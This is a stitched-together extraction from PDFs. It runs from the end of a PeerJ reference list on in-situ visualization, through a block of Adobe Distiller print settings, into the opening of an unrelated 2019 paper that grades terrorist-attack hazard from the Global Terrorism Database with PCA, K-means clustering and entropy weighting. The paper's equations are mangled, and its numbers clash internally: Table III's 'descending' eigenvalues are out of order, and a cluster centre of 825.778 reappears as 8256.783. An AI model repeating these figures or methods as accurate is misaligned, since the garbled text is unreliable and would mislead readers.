2014. An approach to exascale visualization: interactive viewing of in- situ visualization. Computer Physics Communications 185(1):79–85 DOI 10.1016/j.cpc.2013.08.017. Kawamura T, Noda T, Idomura Y. 2016. In-situ visual exploration of multivariate volume data based on particle based volume rendering. In: 2nd Workshop on In Situ Infrastructures for Enabling Extreme-Scale Analysis and Visualization. 18–22. Kress J, Pugmire D, Klasky S, Childs H. 2016. Visualization and analysis requirements for in situ processing for a large-scale fusion simulation code. In: Proceedings of the 2nd Workshop on In Situ Infrastructures for Enabling Extreme-scale Analysis and Visualization. 45–50. Levoy M, Hanrahan P. 1996. Light field rendering. In: Proceedings of the 23rd Annual Conference on Computer Graphics and Interactive Techniques, SIGGRAPH 1996. 31–42. Levoy M, Marc. 1990. Efficient ray tracing of volume data. ACM Transactions on Graphics 9(3):245–261 DOI 10.1145/78964.78965. Lim TT, Nickels TB. 1995. Vortex rings. In: Fluid Vortices. Dordrecht: Kluwer Academic Publishers, 95–153. Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 21/23 http://dx.doi.org/10.7566/JPSJ.84.103401 http://dx.doi.org/10.1016/j.cpc.2013.08.017 http://dx.doi.org/10.1145/78964.78965 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ Lippman A. 1980. Movie-maps: an application of the optical videodisc to computer graphics. Comput Graphics 14(3):32–42 DOI 10.1145/965105.807465. Lofstead J, Klasky S, Schwan K, Podhorszki N, Jin C. 2008. Flexible IO and integration for scientific codes through the adaptable IO system (ADIOS). In: Proceedings of the 6th International Workshop on Challenges of Large Applications in Distributed Environments. 15–24. Ma K-L. 2009. In situ visualization at extreme scale: challenges and opportunities. In: IEEE Computer Graphics And Applications. Piscataway: IEEE, 14–19. Ma KL, Wang C, Yu H, Tikhonova A. 2007. In-situ processing and visualization for ultrascale simulations. Journal of Physics: Conference Series 78(1):1–10. Matthes A, Huebl A, Widera R, Grottel S, Gumhold S, Bussmann M. 2016. In situ, steerable, hardware-independent and data-structure agnostic visualization with ISAAC. Supercomputing Frontiers and Innovations 3(4):30–48. McMillan L, Bishop G. 1995. Plenoptic modeling: an image-based rendering system. In: Proceedings of the ACM SIGGRAPH Conference on Computer Graphics, Vol. 95. 39–46. Miller G, Hoffert E, Chen SE, Patterson E, Blackketter D, Rubin S, Applin SA, Yim D, Hanan J. 1992. The virtual museum: interactive 3D navigation of a multimedia database. Journal of Visualization and Computer Animation 3(3):183–197 DOI 10.1002/vis.4340030305. Miura H. 2019. Extended magnetohydrodynamic simulations of decaying, homogeneous, approximately-isotropic and incompressible turbulence. Fluids 4(1):46 DOI 10.3390/fluids4010046. Miura H, Araki K, Hamba F. 2016. Hall effects and sub-grid-scale modeling in magnetohydrodynamic turbulence simulations. Journal of Computational Physics 316:385–395 DOI 10.1016/j.jcp.2016.03.067. Miura H, Hori D. 2009. Hall effects on local structures in decaying MHD turbulence. Journal of Plasma Fusion Research 8:73–76. Ohno N, Ohtani H. 2014. Development of in-situ visualization tool for PIC simulation. Plasma and Fusion Research 9:3401071 DOI 10.1585/pfr.9.3401071. O’Leary P, Ahrens J, Jourdain S, Wittenburg S, Rogers DH, Petersen M. 2016. Cinema image-based in situ analysis and visualization of MPAS-ocean simulations. Parallel Computing 55:43–48 DOI 10.1016/j.parco.2015.10.005. Puri A, Chen X, Luthra A. 2004. Video coding using the H.264/MPEG-4 AVC compression standard. Signal Processing: Image Communication 19(9):793–849 DOI 10.1016/j.image.2004.06.003. Ross RB, Peterka T, Shen HW, Hong Y, Ma KL, Yu H, Moreland K. 2008. Visualization and parallel I/O at extreme scale. Journal of Physics: Conference Series 125:012099 DOI 10.1088/1742-6596/125/1/012099. Sakamoto N, Koyamada K. 2015. KVS: a simple and effective framework for scientific visualization. Journal of Advanced Simulation in Science and Engineering 2(1):76–95 DOI 10.15748/jasse.2.76. Sakamoto N, Nonaka J, Koyamada K, Tanaka S. 2007. Particle-based volume rendering. In: 6th International Asia-Pacific Symposium on Visualization. Piscataway: IEEE, 129–132. Schroeder W, Martin K, Lorensen B. 2006. The visualization toolkit: an object-oriented approach to 3-D graphics. Fourth Edition. New York: Kitware. Sellers G, Wright RS, Haemel N. 2015. OpenGL superbible: comprehensive tutorial and reference. Seventh Edition. Boston: Addison-Wesley. Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 22/23 http://dx.doi.org/10.1145/965105.807465 http://dx.doi.org/10.1002/vis.4340030305 http://dx.doi.org/10.3390/fluids4010046 http://dx.doi.org/10.1016/j.jcp.2016.03.067 http://dx.doi.org/10.1585/pfr.9.3401071 http://dx.doi.org/10.1016/j.parco.2015.10.005 http://dx.doi.org/10.1016/j.image.2004.06.003 http://dx.doi.org/10.1088/1742-6596/125/1/012099 http://dx.doi.org/10.15748/jasse.2.76 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ Shariff K, Leonard A. 1992. Vortex rings. Annual Review of Fluid Mechanics 24(1):235–279 DOI 10.1146/annurev.fl.24.010192.001315. Shum H, Kang SB. 2000. Review of image-based rendering techniques. Visual Communications and Image Processing 4067:2. Tikhonova A, Correa CD, Ma K-L. 2010a. Explorable images for visualizing volume data. In: Proceedings of IEEE Pacific Visualization Symposium 2010, PacificVis 2010. 177–184. Tikhonova A, Correa CD, Ma KL. 2010b. Visualization by proxy: a novel framework for deferred interaction with volume data. IEEE Transactions on Visualization and Computer Graphics 16(6):1551–1559 DOI 10.1109/TVCG.2010.215. Wald I, Johnson GP, Amstutz J, Brownlee C, Knoll A, Jeffers J, Günther J, Navratil P. 2017. OSPRay—a CPU ray tracing framework for scientific visualization. IEEE Transactions on Visualization and Computer Graphics 23(1):931–940 DOI 10.1109/TVCG.2016.2599041. Wald I, Woop S, Benthin C, Johnson GS, Ernst M. 2014. Embree: a kernel framework for efficient CPU ray tracing. ACM Transactions on Graphics 33(4):8 DOI 10.1145/2601097.2601199. Wang D, Luo X, Yuan F, Podhorszki N. 2017. A data analysis framework for earth system simulation within an in-situ infrastructure. Journal of Computer and Communications 5(14):76–85 DOI 10.4236/jcc.2017.514007. Wetherbee T, Jones E, Knox M, Sandalski S, Woodward P. 2015. In-core volume rendering for Cartesian grid fluid dynamics simulations. In: XSEDE Conference on Scientific Advancements Enabled by Enhanced Cyberinfrastructure. 1–8. Whitlock B, Favre MJ, Meredith SJ. 2011. Parallel in situ coupling of simulation with a fully featured visualization system. In: Eurographics Symposium on Parallel Graphics and Visualization. 101–109. Ye Y, Miller R, Ma K-L. 2013. In situ pathtube visualization with explorable images. In: EGPGV '13: Proceedings of the 13th Eurographics Symposium on Parallel Graphics and Visualization. 9–16. Yu H, Wang C, Grout RW, Chen JH, Ma KL. 2010. In situ visualization for large-scale combustion simulations. IEEE Computer Graphics and Applications 30(3):45–57. Zhang P, Liao X, Zhang K. 2002. Patterns in spherical Rayleigh-Bénard convection: a giant spiral roll and its dislocations. Physical Review E 66(5):4. Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 23/23 http://dx.doi.org/10.1146/annurev.fl.24.010192.001315 http://dx.doi.org/10.1109/TVCG.2010.215 http://dx.doi.org/10.1109/TVCG.2016.2599041 http://dx.doi.org/10.1145/2601097.2601199 http://dx.doi.org/10.4236/jcc.2017.514007 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ 4D street view: a video-based visualization method Introduction Recording stage of 4d street view Test simulations 4D Street Viewer Interactive analysis of the test simulations with 4d street view Discussion Conclusions flink8 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_zo6mjxbmffhftidtrj7nfurd3q ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 81 Hazard Grading Model of Terrorist Attack Based on Machine Learning Yu Jun School of Computer Science and Technology Xi'an Technological University Xi'an 710021, Shaanxi, China e-mail: yujun@xatu.edu.cn Xian Tong School of Computer Science and Technology Xi'an Technological University Xi'an, 710021, Shaanxi, China Hu Zhiyi Institute of Engineering Design Army Academy of PLA Beijing, 100042, China Liu Yutong Engineering Design Institute Army Academy of PLA Beijing, 100042, China Abstract—In this paper, there is no unified grading standard for the harm of terrorist attacks. A classification model of terrorist incidents based on machine learning is proposed. First, the data related to the hazard in the Global Terrorism Database (GTD) is extracted and preprocessed. Secondly, the data is extracted by principal component analysis, and all events are aggregated into 5 by K-means clustering. Again, the entropy method is used to calculate the weighting coefficient of each indicator, and the comprehensive score of the hazard of each type of terrorist attack is calculated. Finally, the scores are divided into 1-5 levels of hazard grading models in order of high to low. The results show that the hazard grading model can scientifically and objectively quantify terrorist attacks. Keywords-Terrorist Attacks; Hazard; Hierarchical Model; Principal Component Analysis; K-Means Clustering; Entropy Method I. INTRODUCTION A terrorist attack is an aggression committed by an extremist or organization that is not in conformity with international morality and is directed against, but not limited to, civilians and civilian installations. It not only has great destructiveness and destructive power, but also directly causes huge casualties and property losses. It also brings tremendous psychological pressure to people, causing a certain degree of turmoil in society and greatly hindering economic development. Global terrorism is a phenomenon of public interest, and everyone is directly affected by it. Therefore, anti- terrorism work is imminent. Big data is now the main source of counter-terrorism intelligence. The Global Terrorism Database (GTD) is the world's most comprehensive database of non-confidential terrorist attacks, containing more than 180,000 terrorist attacks, each containing at least 45 variables. An in-depth analysis of data related to terrorist attacks will help deepen people's understanding of terrorism and provide valuable information support for opposing terrorism and preventing terrorism. Data collection and preprocessing intelligence are the lifeblood of counter- terrorism work. Keeping reliable information in a timely manner can play an active role in combating terrorism and effectively curb the spread of terrorism[2]. Grading catastrophic events (such as earthquakes, traffic accidents, meteorological disasters, etc.) is an important task of social management. The usual grading generally adopts a subjective method, and the authority stipulates the grading standard. The harmfulness of terrorist attacks depends not only on the two aspects of casualties and economic losses, but also on the timing, geography, and targeted objects. Therefore, it is difficult to fully reflect these factors. The hazard grading of terrorist incidents can clearly define the future attacks, and different levels of events correspond to different treatments. This will not only help the management of social security, but also avoid unnecessary waste of manpower and property. Combined with big data processing technology, this paper establishes a hierarchical model based on PCA algorithm, K-meas clustering algorithm and entropy method. First, 14 evaluation indicators related to the hazard of the event were selected to preprocess the DOI: 10.21307/ijanmc-2019-051 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 82 existing data. Secondly, the PCA method was used to reduce the index from 14 dimensions to 4 dimensions, and the reduced dimension vector was obtained by the clustering algorithm. Gather into 5 categories, you can get the category corresponding to each event. Finally, using the entropy method to score the hazard of each event and according to the average hazard score of each class. According to the degree of harm from high to low levels 1 to 5. A hazard grading model of terrorism events is obtained with a hazard rating of 5. II. DATA PREPROCESSING In this paper, the hazard grading model of terrorism events data is established from some important fields of the GTD original database. The selected data handling requires missing value processing, conversion of characters to numeric values and numerical processing. A. Important field selection The Important field of hierarchical is pointed out by the World Anti-Terrorism Incident Research. The Terrorism Hazard Classification Model Data Table has selected the following 14 fields from GTD, as shown in Table 1. TABLE I. THE SELECTED FIELD TABLE Field Description extended Whether it is a continuous event latitude latitude longitude longitude success Successful attack suicide Suicide attack nkill Total number of deaths propextent Degree of property damage nwound Total number of injuries country country region area city city attacktype Attack type targtype Target/victim type weapontype Weapon type B. Missing value processing In the selected field, Python's function DataFrame. dropna can delete rows or columns with null values, and retain all data that is not empty. Then the character field needs to be converted to a numeric field. C. Converting character fields to numeric fields The character field that need to be converted is as follows: 1) Eventid: Events in the GTD are numbered with 12 digits. The first 8 digits are recorded in the format "yyyymmdd". The last 4 digits calibrate the serial number of the day, e.g. 0001, etc. 2) Country: According to the developed economies assessment standards recognized by the United Nations, 168 countries are divided into developed and underdeveloped countries. Since terrorist attacks are more harmful to developed countries, the relevant assignments are shown in Table 2.1. 3) Region: Count the frequency of terrorist incidents in each region and assign the frequency to regional indicator values. 4) City: The world city is divided into three levels: the capital, the provincial capital, and other cities. Since the terrorist attacks are more harmful to the political and economic centers, the relevant assignments are shown in Table 2.1. 5) Attack type: Counting the frequency of occurrence of 9 types of attacks, and assigning the frequency to the attack type indicator value. 6) Weapon type: Counting the frequency of occurrence of 13 weapon types, and assigning this frequency to the weapon type indicator value. 7) Targtype: Counting the frequency of occurrence of 22 target types, and assigning this frequency to the target type indicator value. TABLE II. THE STATE AND CITY ASSIGNMENT Index assignment developed countries 2 underdeveloped countries 1 the capital 3 the provincial capital 2 other cities 1 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 83 D. Numerical processing In the original GTD database, the nkill field includes the number of all victims and terrorists who directly caused death from terrorist incidents. We use only requires the number of victims and does not require the death toll of terrorists. Therefore, the number of victims is obtained by subtracting the number of terrorist deaths (nkiller) from the total number of deaths. III. TERRORIST ATTACK HAZARD CLASSIFICATION MODEL In this paper, the PCA algorithm, K-means clustering algorithm and entropy method are used to classify the terrorist attacks. The process of building a hierarchical model is divided into four steps: 1) The 14 indicators with greater influence is standardized by PCA algorithm. We construct a 14- dimensional matrix, and then reduce the matrix from 14 dimensions to 4 dimensions. 2) The K-means algorithm is used to cluster all the terrorist events in the matrix into five major categories, i.e. five hazard levels. 3) Using the entropy weight method finds the weights of each of the 14 indicators, and then weighting and summing the 14 indicators of each event to obtain the score of the event. For each hazard level, finding the average score for all events is at that level. 4) Sorting by the average scores of the five hazard levels, We divide them into one to five grades from high to low. The higher score means the greater damage. A. Using the PCA algorithm for dimensional reduction Principal Component Analysis (PCA) extracts M- dimensional feature matrices from N-dimensional matrices. First, we calculates eigenvalues and eigenvectors of N-dimensional matrices. According to the order of PCA eigenvalues from large to small, we select the corresponding first M eigenvectors., and then obtain an N*M feature transformation matrix T. In this paper, N=14, M=4. The dimensionality reduction is completed.[6] The order of PCA eigenvalues generated by 14 indicators from large to small is shown in Table 3. TABLE III. CHARACTERISTIC VALUES CORRESPONDING TO THE INDICATORS Indicators Characteristic values nkill 9.82022087e-01 nwound 8.06184462e-02 targtype 7.91122120e-03 country 5.20872985e-02 attacktype 4.84991077e-03 region 4.01240379e-02 suicide 2.66626688e+00 city 2.60031933e-02 longitude 1.84972981e+02 extended 1.63936354e+03 latitude 1.36725606e+03 propextent 1.06560032e-01 success 1.04574700e+02 weapontype 0.00000001e+00 In this paper, 98686 data is reduced by the PCA algorithm, i.e. the original 14-dimensional matrix   1 2 3 4 5 6 7 8 9 10 11 12 13 14x = x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x is reduced to a 4- dimensional matrix 1 2 3 4 Y = y ,y ,y ,y   . The corresponding contribution degrees of the 4-dimensional feature vectors are: 0.49, 0.42, 0.06, 0.03, and the sum is greater than 0.99. Therefore, the dimension-reduced matrix preserves most of the original data and can be directly used for clustering. B. Using K-Means algorithm for Hazard classification The main idea of the K-means clustering algorithm is to cluster a number of discrete data points with k centroids and divide them into k clusters to distinguish data points with less similarity. Sum of the squared error (SSE) is the objective function of clustering, and classify data points with similar similarity into one class. The method finally converges to the optimal solution by continuously updating the centroid attribution and centroid position of the data points[1]. The algorithm process is as follows: 1) We select 5 event objects as the initial cluster center. 2) We calculate the Euclidean distance from each event to each cluster center and assign this event to the nearest cluster. 3) After all the event assignments are completed, the five cluster centers are recalculated, and compared with the cluster center obtained in the previous calculation. If the cluster center changes, the Euclidean distance and the assigned category are recalculated. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 84 4) When the cluster center does not change, the clustering result is directly output. Calculate the cluster center to which each type of event belongs, as shown in Table 4. TABLE IV. TABLE 4. CLUSTERING CENTER FOR EVENT CLASSIFICATION type X1 X2 X3 X4 numbers 0 2.4843 -16.3826 -1.3464 0.3081 63122 1 -3.3968 22.8297 -3.8782 0.0615 37848 2 825.778 873.697 28.9316 -104.59 2 3 13.8411 -127.794 19.7789 -2.7281 3500 4 -9.5985 63.3898 16.7324 -1.2382 9711 The formula for calculating each event category is as shown in Equations (1) to (6).         2 2 2 2 1 1 2 3 1 ( 8256.783) ( 873.658) ( 28.915) ( 104.608)D y y y y            2 2 2 2 2 1 2 3 4 ( 13.840) ( 127.794) ( 19.779) ( 2.728)D y y y y           2 2 2 2 3 1 2 3 4 ( 2.484) ( 16.382) ( 1.346) ( 0.308)D y y y y   2 2 2 2 4 1 2 3 4 ( 3.396) ( 22.829) ( 3.878) ( 0.061)D y y y y                   2 2 2 2 5 1 2 3 4 ( 9.598) ( 63.289) ( 16.731) ( 1.238)D y y y y    i 1 2 3 4 5min min{D ,D ,D ,D ,D } 